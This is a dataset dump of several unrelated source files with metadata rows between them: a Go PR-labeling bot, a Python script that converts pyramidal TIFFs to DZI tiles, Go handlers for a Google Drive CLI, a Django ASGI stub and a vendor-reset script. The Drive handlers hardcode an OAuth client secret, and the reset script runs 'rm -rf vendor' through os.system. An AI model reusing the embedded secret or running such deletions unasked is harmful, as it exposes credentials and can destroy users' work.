log.Printf("Matching `%s` against: %s", strings.Join(matcher.Files, ", "), strings.Join(prFiles, ", "))
for _, fileMatcher := range matcher.Files {
for _, prFile := range prFiles {
isMatched, _ := regexp.Match(fileMatcher, []byte(prFile))
if isMatched {
log.Printf("Matched `%s` against: `%s`", prFile, fileMatcher)
return isMatched, nil
}
}
}
return false, nil
},
}
}
func NewIsMergeableCondition() Condition {
return Condition{
GetName: func() string {
return "Pull Request is mergeable"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
b, err := strconv.ParseBool(matcher.Mergeable)
if err != nil {
return false, fmt.Errorf("mergeable is not set in config")
}
if b {
return pr.GetMergeable(), nil
}
return !pr.GetMergeable(), nil
},
}
}
func NewSizeCondition() Condition {
return Condition{
GetName: func() string {
return "Pull Request contains a number of changes"
},
Evaluate: func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error) {
if len(matcher.SizeBelow) == 0 && len(matcher.SizeAbove) == 0 {
return false, fmt.Errorf("size-above and size-below are not set in config")
}
upperBound, err := strconv.ParseInt(matcher.SizeBelow, 0, 64)
if err != nil {
upperBound = math.MaxInt64
log.Printf("Upper boundary set to %d (config has invalid or empty value)", upperBound)
}
lowerBound, err := strconv.ParseInt(matcher.SizeAbove, 0, 32)
if err != nil || lowerBound < 0 {
lowerBound = 0
log.Printf("Lower boundary set to 0 (config has invalid or empty value)")
}
totalChanges := int64(math.Abs(float64(pr.GetAdditions() + pr.GetDeletions())))
log.Printf("Matching %d changes in PR against bounds: (%d, %d)", totalChanges, lowerBound, upperBound)
isWithinBounds := totalChanges > lowerBound && totalChanges < upperBound
return isWithinBounds, nil
},
}
}
// HandleEvent takes a GitHub Event and its raw payload (see link below)
// to trigger an update to the issue / PR's labels.
//
// https://developer.github.com/v3/activity/events/types/
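//
// Note: only pull_request events currently result in label changes; any
// other event type parses successfully but is a no-op (see the switch below).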
func (l *Labeler) HandleEvent(
eventName string,
payload *[]byte) error {
event, err := gh.ParseWebHook(eventName, *payload)
if err != nil {
return err
}
switch event := event.(type) {
case *gh.PullRequestEvent:
err = l.executeOn(event.PullRequest)
}
return err
}
func (l *Labeler) executeOn(pr *gh.PullRequest) error {
owner := pr.Base.Repo.GetOwner().GetLogin()
repoName := *pr.Base.Repo.Name
config, err := l.FetchRepoConfig(owner, repoName)
if err != nil {
return err
}
labelUpdates, err := l.findMatches(pr, config)
if err != nil {
return err
}
currLabels, err := l.GetCurrentLabels(owner, repoName, *pr.Number)
if err != nil {
return err
}
// intentions(label) tells whether `label` should be set in the PR
intentions := map[string]bool{}
// initialize with current labels
for _, label := range currLabels {
intentions[label] = true
}
// update, adding new ones and unflagging those to remove
for label, isDesired := range labelUpdates.set {
intentions[label] = isDesired
}
// filter out only labels that must be set
desiredLabels := []string{}
for k, v := range intentions {
if v {
desiredLabels = append(desiredLabels, k)
}
}
log.Printf("Desired labels: %s", desiredLabels)
return l.ReplaceLabelsForPr(owner, repoName, *pr.Number, desiredLabels)
}
// findMatches returns all updates to be made to labels for the given PR
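// A label ends up set only when every condition configured for its matcher
// evaluates to true; conditions whose option is absent from the matcher
// return an error and are skipped.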
func (l *Labeler) findMatches(pr *gh.PullRequest, config *LabelerConfig) (LabelUpdates, error) {
labelUpdates := LabelUpdates{
set: map[string]bool{},
}
conditions := []Condition{
NewTitleCondition(),
NewBranchCondition(),
NewIsMergeableCondition(),
NewSizeCondition(),
NewFilesCondition(),
}
for label, matcher := range *config {
for _, c := range conditions {
isMatched, err := c.Evaluate(pr, matcher)
if err != nil {
log.Printf("%s: condition %s skipped (%s)", label, c.GetName(), err)
continue
}
prev, ok := labelUpdates.set[label]
if ok { // Other conditions were evaluated for the label
labelUpdates.set[label] = prev && isMatched
} else { // First condition evaluated for this label
labelUpdates.set[label] = isMatched
}
log.Printf("%s: condition %s yields %t", label, c.GetName(), isMatched)
if isMatched {
continue
}
}
}
return labelUpdates, nil
}
// getPrFileNames returns all of the file names (old and new) of files changed in the given PR
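// The diff is fetched from pr.GetDiffURL() using the GITHUB_TOKEN environment
// variable as a bearer token (see below).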
func getPrFileNames(pr *gh.PullRequest) ([]string, error) {
ghToken := os.Getenv("GITHUB_TOKEN")
diffReq, err := http.NewRequest("GET", pr.GetDiffURL(), nil)
if err != nil {
return nil, err
}
diffReq.Header.Add("Authorization", "Bearer "+ghToken)
diffRes, err := http.DefaultClient.Do(diffReq)
if err != nil {
return nil, err
}
defer diffRes.Body.Close()
var diffRaw []byte
prFiles := make([]string, 0)
if diffRes.StatusCode == http.StatusOK {
diffRaw, err = ioutil.ReadAll(diffRes.Body)
if err != nil {
return nil, err
}
diff, _ := diffparser.Parse(string(diffRaw))
prFilesSet := map[string]struct{}{}
// Place in a set to remove duplicates
for _, file := range diff.Files {
prFilesSet[file.OrigName] = struct{}{}
prFilesSet[file.NewName] = struct{}{}
}
// Convert to list to make it easier to consume
for k := range prFilesSet {
prFiles = append(prFiles, k)
}
}
return prFiles, nil
}
|
[
"\"GITHUB_TOKEN\""
] |
[] |
[
"GITHUB_TOKEN"
] |
[]
|
["GITHUB_TOKEN"]
|
go
| 1 | 0 | |
pyramid/extract2dzi_rgb.py
|
#!/usr/bin/env python
import sys
import os
import re
import numpy
from PIL import Image
import StringIO
# you need to install this library yourself
# recent versions handle bigtiff too...
import tifffile
"""
Extract pyramidal TIFF files with JPEG tiled storage into a tree of
separate JPEG files in a DZI-compliant directory usable by
OpenSeadragon. Information from multiple channels is combined into a
single JPEG.
usage: extract2dzi_rgb.py pyramid-file-dir dest-dir
The pyramid-file must be a multi-page TIFF with each page having an
image scaled by 1/2 from the previous page. All pages must be tiled
with the same tile size, and tiles must be stored using the new-style
JPEG compression format, i.e. TIFF compression == 7.
The lowest-resolution page must have 4 or fewer tiles. If it has more
than 1, this script leaves it to the user to decide whether a final
lowest-zoom tile 0/0_0.jpg, a 1/2-scaled version of the image
represented by that last page, should be generated.
File directory generated
dest-dir
ImageProperties.xml
0
0_0.jpg
1
0_0.jpg
1_0.jpg
...
Since the tiled TIFF keeps padded tiles while OpenSeadragon expects its
JPEG files to be cropped rather than padded, the border tiles are
cropped and the reported image width and height use the actual image
dimensions.
"""
try:
srcloc = sys.argv[1]
outloc = sys.argv[2]
if not os.path.exists(srcloc) or not os.path.isdir(srcloc):
sys.stderr.write('Pyramid directory must be given and exist')
sys.stderr.write('\nusage: extract2dzi_rgb.py pyramid-file-directory dest-dir\n\n')
sys.exit(1)
if not os.path.exists(outloc):
os.makedirs(outloc)
except:
sys.stderr.write('\nusage: extract2dzi_rgb.py pyramid-file-directory dest-dir\n\n')
raise
## 20140403-R26-Tdt-JJG-0-38-000-DAPI-Z3.tif
## 20140403-R26-Tdt-JJG-0-38-000-FITC-Z3.tif
## 20140403-R26-Tdt-JJG-0-38-000-Rhodamine-Z3.tif
## iterate through the files,
## if valid tiff file, then change the outdir to
## outdir/DAPI/.xml,0,1..
## essentially like calling extract2dzi.py filename outdir/color
infile=None
txsize=0
tysize=0
pxsize=0
pysize=0
zoomno=0
outinfo=[]
total_tiles=0
topdir_template = '%(outdir)s'
dir_template = topdir_template +'/%(zoomno)d'
tile_template = dir_template + '/%(tcolno)d_%(trowno)d.jpg'
image_template = '%(outdir)s/ImageProperties.xml'
################# helper functions ###################
# http://www.w3.org/Graphics/JPEG/jfif3.pdf
def jpeg_assemble(jpeg_tables_bytes, jpeg_bytes):
return jpeg_bytes[0:2] + jpeg_tables_bytes + jpeg_bytes[2:]
def load_tile(infile, tile_offset, tile_length):
infile.seek(tile_offset)
return infile.read(tile_length)
def getTile(page, infile, jpeg_tables_bytes, tileno):
jpeg = jpeg_assemble(jpeg_tables_bytes, load_tile(infile, page.tags.tile_offsets.value[tileno], page.tags.tile_byte_counts.value[tileno]))
outfile = StringIO.StringIO()
outfile.write( jpeg )
outfile.seek(0)
image = Image.open(outfile)
ret = numpy.asarray(image)
outfile.close()
return ret
def maxTile(page, infile):
pxsize, pysize, txsize, tysize, tcols, trows, jpeg_tables_bytes = get_page_info(page)
maxval = 0
for tileno in range(0, len(page.tags.tile_offsets.value)):
tile = getTile(page, infile, jpeg_tables_bytes, tileno)
maxval = max(maxval, tile.max())
return maxval
def write_tile(tileno, trow, trows, tcol, tcols, rgb_image):
"""Output one tile. Note this manages global state for tile grouping in subdirs."""
global zoomno
global total_tiles
cropIt = False
if (trow+1 == trows) or (tcol+1 == tcols) :
#this is a border tile, crop it if need to
if tcol+1 == tcols :
cpxsize= (pxsize-(txsize * tcol))
else:
cpxsize=txsize
if trow+1 == trows :
cpysize= (pysize-(tysize * trow))
else:
cpysize=tysize
cropIt = True
total_tiles += 1
topdir = topdir_template % dict(
outdir = outloc
)
if not os.path.exists(topdir):
os.makedirs(topdir, mode=0755)
dirname = dir_template % dict(
outdir = outloc,
zoomno = zoomno
)
if not os.path.exists(dirname):
# create tile group dir on demand
os.makedirs(dirname, mode=0755)
outname = tile_template % dict(
outdir = outloc,
zoomno = zoomno,
tcolno = tcol,
trowno = trow
)
if cropIt :
rgb_image = rgb_image.crop((0,0, cpxsize, cpysize))
rgb_image.save(outname, 'JPEG')
return outname
def get_page_info(page):
pxsize = page.tags.image_width.value
pysize = page.tags.image_length.value
# get common JPEG tables to insert into all tiles
# ffd8 ffdb .... ffd9
if hasattr(page.tags, 'jpeg_tables'):
# trim off start-image/end-image byte markers at prefix and suffix
jpeg_tables_bytes = bytes(bytearray(page.tags.jpeg_tables.value))[2:-2]
else:
# no common tables to insert?
jpeg_tables_bytes = bytes(bytearray([]))
# this page has multiple JPEG tiles
txsize = page.tags.tile_width.value
tysize = page.tags.tile_length.value
tcols = pxsize / txsize + (pxsize % txsize > 0)
trows = pysize / tysize + (pysize % tysize > 0)
return pxsize, pysize, txsize, tysize, tcols, trows, jpeg_tables_bytes
def processTiff() :
global infile
global txsize
global tysize
global pxsize
global pysize
global zoomno
global total_tiles
# fname=tiff_files[0];
# chop=re.search('(?:[-][^-]*[-]Z[0-9]).tif', fname);
# t=chop.group(0)
for file in range(0, len(tiff_files)):
tiff = tifffile.TiffFile(srcloc+'/'+tiff_files[file])
tiff_tifffile.append(tiff)
pages = list(tiff)
pages.reverse()
outpages = [ page for page in pages if hasattr(page.tags, 'tile_offsets') ]
if type(outpages[0].tags.tile_offsets.value) is int:
outpages[0].tags.tile_offsets.value=[outpages[0].tags.tile_offsets.value]
outpages[0].tags.tile_byte_counts.value=[outpages[0].tags.tile_byte_counts.value]
tiff_outpages.append(outpages)
infile = open(srcloc+'/'+tiff_files[file], 'rb')
tiff_infile.append(infile)
# skip pages that aren't tiled... thumbnails?!
# outpages = tiff_outpages[0]
zoomno = 0
lowest_level = 0
total_tiles = 0
# remember values for debugging sanity checks
prev_page = None
tile_width = None
tile_length = None
reduce_ratio = 2 # default
###############CODE############
for channelno in range(0, len(tiff_outpages)):
tiff_maxval.append([])
for pageno in range(0, len(tiff_outpages[0])):
tiff_maxval[channelno].append(max(0, maxTile(tiff_outpages[channelno][pageno], tiff_infile[channelno])))
for pageno in range(0, len(tiff_outpages[0])):
page = tiff_outpages[0][pageno]
# panic if these change from reverse-engineered samples
assert page.tags.fill_order.value == 1
assert page.tags.orientation.value == 1
assert page.tags.compression.value == 7 # new-style JPEG
if prev_page is not None:
reduce_ratio=page.tags.image_width.value / prev_page.tags.image_width.value
tiff_page_info = []
for channelno in range(0, len(tiff_outpages)):
tiff_page_info.append(tiff_outpages[channelno][pageno])
for tileno in range(0, len(page.tags.tile_offsets.value)):
tile_array = []
for channelno in range(0, len(tiff_outpages)):
tiffPage = tiff_outpages[channelno][pageno]
pxsize, pysize, txsize, tysize, tcols, trows, jpeg_tables_bytes = get_page_info(tiffPage)
# figure position of tile within tile array
trow = tileno / tcols
tcol = tileno % tcols
assert trow >= 0 and trow < trows
assert tcol >= 0 and tcol < tcols
if tile_width is not None:
assert tile_width == txsize
assert tile_length == tysize
else:
tile_width = txsize
tile_length = tysize
tile = getTile(tiffPage, tiff_infile[channelno], jpeg_tables_bytes, tileno)
tile_norm = (255 * (tile.astype('float') / tiff_maxval[channelno][pageno])).astype('uint8')
tile_array.append(tile_norm)
rgb_array = numpy.dstack( tuple(tile_array) )
rgb_image = Image.fromarray(rgb_array)
write_tile(tileno, trow, trows, tcol, tcols, rgb_image)
outinfo.append(
dict(
tile_width= txsize,
tile_length= tysize,
image_width_orig= pxsize,
image_length_orig= pysize,
image_width_padded= tcols * txsize,
image_length_padded= trows * tysize,
image_level = zoomno,
total_tile_count= total_tiles,
color_type = 'combo',
level_scale=reduce_ratio
)
)
# each page is next higher zoom level
zoomno += 1
prev_page = page
for infile in tiff_infile:
infile.close()
imageinfo=outinfo[-1]
imageinfo['image_lowest_level']=lowest_level
imageinfo['data_location']=outloc;
image_descriptor = """\
<?xml version="1.0" encoding="UTF-8"?>
<IMAGE_PROPERTIES
width="%(image_width_orig)d"
height="%(image_length_orig)d"
numTiles="%(total_tile_count)d"
numImages="1"
version="2.0"
meterScaleInPixels="402738.62263391056"
tileWidth="%(tile_width)d"
tileHeight="%(tile_length)d"
levelScale="%(level_scale)d"
channelName="%(color_type)s"
minLevel="%(image_lowest_level)d"
maxLevel="%(image_level)d"
data="%(data_location)s"
/>
""" % imageinfo
iname= image_template % dict(outdir = outloc)
f = open('%s' % iname, 'w')
f.write(image_descriptor)
f.close()
###############################################
tiff_files = []
tiff_outpages = []
tiff_tifffile = []
tiff_infile = []
tiff_maxval = []
redColors = ['Rhodamine', 'RFP', 'Alexa Fluor 555', 'Alexa Fluor 594', 'tdTomato', 'Alexa Fluor 633', 'Alexa Fluor 647']
greenColors = ['FITC', 'Alexa 488', 'EGFP', 'Alexa Fluor 488']
blueColors = ['DAPI']
tiff_colors = {'reds': redColors, 'greens': greenColors, 'blues': blueColors}
def getFileColors(file):
colorMatched = None
for colors in tiff_colors:
for color in tiff_colors[colors]:
if re.match('.*[-]%s([-]Z[0-9]+)*[.]tif' % color, file):
colorMatched = True
return colors
if not colorMatched:
sys.stderr.write('Unknown color for file "%s" \n' % file)
sys.exit(1)
def getFileColor(file):
colorMatched = None
for colors in tiff_colors:
for color in tiff_colors[colors]:
if re.match('.*[-]%s([-]Z[0-9]+)*[.]tif' % color, file):
colorMatched = True
return color
if not colorMatched:
sys.stderr.write('Unknown color for file "%s" \n' % file)
sys.exit(1)
def checkFileColors(files):
for file in files:
colorMatched = None
for colors in tiff_colors:
for color in tiff_colors[colors]:
if re.match('.*[-]%s([-]Z1)*[.]tif' % color, file):
colorMatched = True
break
if colorMatched:
break
if not colorMatched:
sys.stderr.write('000Unknown color for file "%s" \n' % file)
sys.exit(1)
def colorFile(files, colors, pattern):
tifFiles = []
for color in colors:
colorFiles = [ f for f in files if re.match('.*[-]%s%s' % (color, pattern), f) ]
if len(colorFiles) == 1:
tifFiles.append(colorFiles[0])
if len(tifFiles) > 0:
return tifFiles
else:
return None
def getTiffFiles(dname):
global tiff_files
files = os.listdir(dname)
z1 = [f for f in files if re.match('.*[-]Z1[.]tif', f)]
if len(z1) > 0:
checkFileColors(z1)
stacks = len(files) / len(z1)
stackNo = stacks / 2
if stackNo * 2 < stacks:
stackNo += 1
stackPattern = '[-]Z%d[.]tif' % stackNo
else:
stackPattern = '[.]tif'
for colors in tiff_colors:
colorFiles = colorFile(files, colors, stackPattern)
if colorFiles:
for file in colorFiles:
tiff_files.append(file)
if len(tiff_files) == 0:
files = [ '%s' % (f) for f in files if re.match('.*%s' % stackPattern, f) ]
## need to reorder it into RGB order.
red_one=0
blue_one=0
green_one=0
for f in files:
c=getFileColors(f)
if c == 'reds':
red_one=f
if c == 'blues':
blue_one=f
if c == 'greens':
green_one=f
tiff_files = [red_one, green_one, blue_one ]
# print "red is "+red_one
# print "blue is "+blue_one
# print "green is "+green_one
####### Main body ######
try:
getTiffFiles(srcloc)
except SystemExit:
raise
if len(tiff_files) == 0:
print 'Nothing to do'
sys.exit()
if not os.path.exists(outloc):
os.makedirs(outloc)
processTiff()
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
handlers_drive.go
|
package main
import (
"fmt"
"golang.org/x/net/context"
"golang.org/x/oauth2"
"io"
"io/ioutil"
"net/http"
"os"
"path/filepath"
"time"
"github.com/RyuujiX/gdrive/auth"
"github.com/RyuujiX/gdrive/cli"
"github.com/RyuujiX/gdrive/drive"
)
const ClientId = "599812208586-nlhdfs4jubm6i2f6jel3sangh78haoat.apps.googleusercontent.com"
const ClientSecret = "VmHD_Kmxcdv7wFqCikvG5ddY"
const TokenFilename = "token_v2.json"
const DefaultCacheFileName = "file_cache.json"
func listHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).List(drive.ListFilesArgs{
Out: os.Stdout,
MaxFiles: args.Int64("maxFiles"),
NameWidth: args.Int64("nameWidth"),
Query: args.String("query"),
SortOrder: args.String("sortOrder"),
SkipHeader: args.Bool("skipHeader"),
SizeInBytes: args.Bool("sizeInBytes"),
AbsPath: args.Bool("absPath"),
})
checkErr(err)
}
func listChangesHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListChanges(drive.ListChangesArgs{
Out: os.Stdout,
PageToken: args.String("pageToken"),
MaxChanges: args.Int64("maxChanges"),
Now: args.Bool("now"),
NameWidth: args.Int64("nameWidth"),
SkipHeader: args.Bool("skipHeader"),
})
checkErr(err)
}
func downloadHandler(ctx cli.Context) {
args := ctx.Args()
checkDownloadArgs(args)
err := newDrive(args).Download(drive.DownloadArgs{
Out: os.Stdout,
Id: args.String("fileId"),
Force: args.Bool("force"),
Skip: args.Bool("skip"),
Path: args.String("path"),
Delete: args.Bool("delete"),
Recursive: args.Bool("recursive"),
Stdout: args.Bool("stdout"),
Progress: progressWriter(args.Bool("noProgress")),
Timeout: durationInSeconds(args.Int64("timeout")),
})
checkErr(err)
}
func downloadQueryHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).DownloadQuery(drive.DownloadQueryArgs{
Out: os.Stdout,
Query: args.String("query"),
Force: args.Bool("force"),
Skip: args.Bool("skip"),
Recursive: args.Bool("recursive"),
Path: args.String("path"),
Progress: progressWriter(args.Bool("noProgress")),
})
checkErr(err)
}
func downloadSyncHandler(ctx cli.Context) {
args := ctx.Args()
cachePath := filepath.Join(args.String("configDir"), DefaultCacheFileName)
err := newDrive(args).DownloadSync(drive.DownloadSyncArgs{
Out: os.Stdout,
Progress: progressWriter(args.Bool("noProgress")),
Path: args.String("path"),
RootId: args.String("fileId"),
DryRun: args.Bool("dryRun"),
DeleteExtraneous: args.Bool("deleteExtraneous"),
Timeout: durationInSeconds(args.Int64("timeout")),
Resolution: conflictResolution(args),
Comparer: NewCachedMd5Comparer(cachePath),
})
checkErr(err)
}
func downloadRevisionHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).DownloadRevision(drive.DownloadRevisionArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
RevisionId: args.String("revId"),
Force: args.Bool("force"),
Stdout: args.Bool("stdout"),
Path: args.String("path"),
Progress: progressWriter(args.Bool("noProgress")),
Timeout: durationInSeconds(args.Int64("timeout")),
})
checkErr(err)
}
func uploadHandler(ctx cli.Context) {
args := ctx.Args()
checkUploadArgs(args)
err := newDrive(args).Upload(drive.UploadArgs{
Out: os.Stdout,
Progress: progressWriter(args.Bool("noProgress")),
Path: args.String("path"),
Name: args.String("name"),
Description: args.String("description"),
Parents: args.StringSlice("parent"),
Mime: args.String("mime"),
Recursive: args.Bool("recursive"),
Share: args.Bool("share"),
Delete: args.Bool("delete"),
ChunkSize: args.Int64("chunksize"),
Timeout: durationInSeconds(args.Int64("timeout")),
})
checkErr(err)
}
func uploadStdinHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).UploadStream(drive.UploadStreamArgs{
Out: os.Stdout,
In: os.Stdin,
Name: args.String("name"),
Description: args.String("description"),
Parents: args.StringSlice("parent"),
Mime: args.String("mime"),
Share: args.Bool("share"),
ChunkSize: args.Int64("chunksize"),
Timeout: durationInSeconds(args.Int64("timeout")),
Progress: progressWriter(args.Bool("noProgress")),
})
checkErr(err)
}
func uploadSyncHandler(ctx cli.Context) {
args := ctx.Args()
cachePath := filepath.Join(args.String("configDir"), DefaultCacheFileName)
err := newDrive(args).UploadSync(drive.UploadSyncArgs{
Out: os.Stdout,
Progress: progressWriter(args.Bool("noProgress")),
Path: args.String("path"),
RootId: args.String("fileId"),
DryRun: args.Bool("dryRun"),
DeleteExtraneous: args.Bool("deleteExtraneous"),
ChunkSize: args.Int64("chunksize"),
Timeout: durationInSeconds(args.Int64("timeout")),
Resolution: conflictResolution(args),
Comparer: NewCachedMd5Comparer(cachePath),
})
checkErr(err)
}
func updateHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Update(drive.UpdateArgs{
Out: os.Stdout,
Id: args.String("fileId"),
Path: args.String("path"),
Name: args.String("name"),
Description: args.String("description"),
Parents: args.StringSlice("parent"),
Mime: args.String("mime"),
Progress: progressWriter(args.Bool("noProgress")),
ChunkSize: args.Int64("chunksize"),
Timeout: durationInSeconds(args.Int64("timeout")),
})
checkErr(err)
}
func infoHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Info(drive.FileInfoArgs{
Out: os.Stdout,
Id: args.String("fileId"),
SizeInBytes: args.Bool("sizeInBytes"),
})
checkErr(err)
}
func importHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Import(drive.ImportArgs{
Mime: args.String("mime"),
Out: os.Stdout,
Path: args.String("path"),
Parents: args.StringSlice("parent"),
Progress: progressWriter(args.Bool("noProgress")),
})
checkErr(err)
}
func exportHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Export(drive.ExportArgs{
Out: os.Stdout,
Id: args.String("fileId"),
Mime: args.String("mime"),
PrintMimes: args.Bool("printMimes"),
Force: args.Bool("force"),
})
checkErr(err)
}
func listRevisionsHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListRevisions(drive.ListRevisionsArgs{
Out: os.Stdout,
Id: args.String("fileId"),
NameWidth: args.Int64("nameWidth"),
SizeInBytes: args.Bool("sizeInBytes"),
SkipHeader: args.Bool("skipHeader"),
})
checkErr(err)
}
func mkdirHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Mkdir(drive.MkdirArgs{
Out: os.Stdout,
Name: args.String("name"),
Description: args.String("description"),
Parents: args.StringSlice("parent"),
})
checkErr(err)
}
func shareHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Share(drive.ShareArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
Role: args.String("role"),
Type: args.String("type"),
Email: args.String("email"),
Domain: args.String("domain"),
Discoverable: args.Bool("discoverable"),
})
checkErr(err)
}
func shareListHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListPermissions(drive.ListPermissionsArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
})
checkErr(err)
}
func shareRevokeHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).RevokePermission(drive.RevokePermissionArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
PermissionId: args.String("permissionId"),
})
checkErr(err)
}
func deleteHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).Delete(drive.DeleteArgs{
Out: os.Stdout,
Id: args.String("fileId"),
Recursive: args.Bool("recursive"),
})
checkErr(err)
}
func listSyncHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListSync(drive.ListSyncArgs{
Out: os.Stdout,
SkipHeader: args.Bool("skipHeader"),
})
checkErr(err)
}
func listRecursiveSyncHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).ListRecursiveSync(drive.ListRecursiveSyncArgs{
Out: os.Stdout,
RootId: args.String("fileId"),
SkipHeader: args.Bool("skipHeader"),
PathWidth: args.Int64("pathWidth"),
SizeInBytes: args.Bool("sizeInBytes"),
SortOrder: args.String("sortOrder"),
})
checkErr(err)
}
func deleteRevisionHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).DeleteRevision(drive.DeleteRevisionArgs{
Out: os.Stdout,
FileId: args.String("fileId"),
RevisionId: args.String("revId"),
})
checkErr(err)
}
func aboutHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).About(drive.AboutArgs{
Out: os.Stdout,
SizeInBytes: args.Bool("sizeInBytes"),
})
checkErr(err)
}
func aboutImportHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).AboutImport(drive.AboutImportArgs{
Out: os.Stdout,
})
checkErr(err)
}
func aboutExportHandler(ctx cli.Context) {
args := ctx.Args()
err := newDrive(args).AboutExport(drive.AboutExportArgs{
Out: os.Stdout,
})
checkErr(err)
}
func getOauthClient(args cli.Arguments) (*http.Client, error) {
if args.String("refreshToken") != "" && args.String("accessToken") != "" {
ExitF("Access token not needed when refresh token is provided")
}
oauth_context := context.TODO()
if args.Bool("disable-compression") {
oauth_context = context.WithValue(oauth_context, oauth2.HTTPClient,
&http.Client{Transport: &http.Transport{DisableCompression: true}})
}
if args.String("refreshToken") != "" {
return auth.NewRefreshTokenClient(ClientId, ClientSecret, oauth_context, args.String("refreshToken")), nil
}
if args.String("accessToken") != "" {
return auth.NewAccessTokenClient(ClientId, ClientSecret, oauth_context, args.String("accessToken")), nil
}
configDir := getConfigDir(args)
if args.String("serviceAccount") != "" {
serviceAccountPath := ConfigFilePath(configDir, args.String("serviceAccount"))
serviceAccountClient, err := auth.NewServiceAccountClient(serviceAccountPath, oauth_context)
if err != nil {
return nil, err
}
return serviceAccountClient, nil
}
tokenPath := ConfigFilePath(configDir, TokenFilename)
return auth.NewFileSourceClient(ClientId, ClientSecret, oauth_context, tokenPath, authCodePrompt)
}
func getConfigDir(args cli.Arguments) string {
// Use dir from environment var if present
if os.Getenv("GDRIVE_CONFIG_DIR") != "" {
return os.Getenv("GDRIVE_CONFIG_DIR")
}
return args.String("configDir")
}
func newDrive(args cli.Arguments) *drive.Drive {
oauth, err := getOauthClient(args)
if err != nil {
ExitF("Failed getting oauth client: %s", err.Error())
}
client, err := drive.New(oauth)
if err != nil {
ExitF("Failed getting drive: %s", err.Error())
}
return client
}
func authCodePrompt(url string) func() string {
return func() string {
fmt.Println("Authentication needed")
fmt.Println("Go to the following url in your browser:")
fmt.Printf("%s\n\n", url)
fmt.Print("Enter verification code: ")
var code string
if _, err := fmt.Scan(&code); err != nil {
fmt.Printf("Failed reading code: %s", err.Error())
}
return code
}
}
func progressWriter(discard bool) io.Writer {
if discard {
return ioutil.Discard
}
return os.Stderr
}
func durationInSeconds(seconds int64) time.Duration {
return time.Second * time.Duration(seconds)
}
func conflictResolution(args cli.Arguments) drive.ConflictResolution {
keepLocal := args.Bool("keepLocal")
keepRemote := args.Bool("keepRemote")
keepLargest := args.Bool("keepLargest")
if (keepLocal && keepRemote) || (keepLocal && keepLargest) || (keepRemote && keepLargest) {
ExitF("Only one conflict resolution flag can be given")
}
if keepLocal {
return drive.KeepLocal
}
if keepRemote {
return drive.KeepRemote
}
if keepLargest {
return drive.KeepLargest
}
return drive.NoResolution
}
func checkUploadArgs(args cli.Arguments) {
if args.Bool("recursive") && args.Bool("delete") {
ExitF("--delete is not allowed for recursive uploads")
}
if args.Bool("recursive") && args.Bool("share") {
ExitF("--share is not allowed for recursive uploads")
}
}
func checkDownloadArgs(args cli.Arguments) {
if args.Bool("recursive") && args.Bool("delete") {
ExitF("--delete is not allowed for recursive downloads")
}
}
|
[
"\"GDRIVE_CONFIG_DIR\"",
"\"GDRIVE_CONFIG_DIR\""
] |
[] |
[
"GDRIVE_CONFIG_DIR"
] |
[]
|
["GDRIVE_CONFIG_DIR"]
|
go
| 1 | 0 | |
doctorweb/asgi.py
|
"""
ASGI config for doctorweb project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'doctorweb.settings')
application = get_asgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
scripts/reset_vendor.py
|
"""Script to update vendor dependencies"""
import os
def main():
"""Main function"""
gopath = os.environ["GOPATH"]
terraform_path = os.path.join(*[gopath, "src", "github.com", "willguibr",
"terraform-provider-zpa"])
os.chdir(terraform_path)
os.system("git reset HEAD")
os.system("git stash")
os.system("rm -rf vendor")
os.system("git checkout vendor")
if __name__ == "__main__":
main()
|
[] |
[] |
[
"GOPATH"
] |
[]
|
["GOPATH"]
|
python
| 1 | 0 | |
cmd/prometheus/config.go
|
// Copyright 2015 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"flag"
"fmt"
"net"
"net/url"
"os"
"sort"
"strings"
"text/template"
"time"
"unicode"
"github.com/asaskevich/govalidator"
"github.com/prometheus/common/log"
"github.com/prometheus/prometheus/notifier"
"github.com/prometheus/prometheus/promql"
"github.com/prometheus/prometheus/storage/local"
"github.com/prometheus/prometheus/storage/local/chunk"
"github.com/prometheus/prometheus/storage/local/index"
"github.com/prometheus/prometheus/storage/remote"
"github.com/prometheus/prometheus/web"
)
// cfg contains immutable configuration parameters for a running Prometheus
// server. It is populated by its flag set.
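// For example (illustrative), passing "-web.listen-address=:9191" on the
// command line populates cfg.web.ListenAddress through the StringVar
// registration in init() below.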
var cfg = struct {
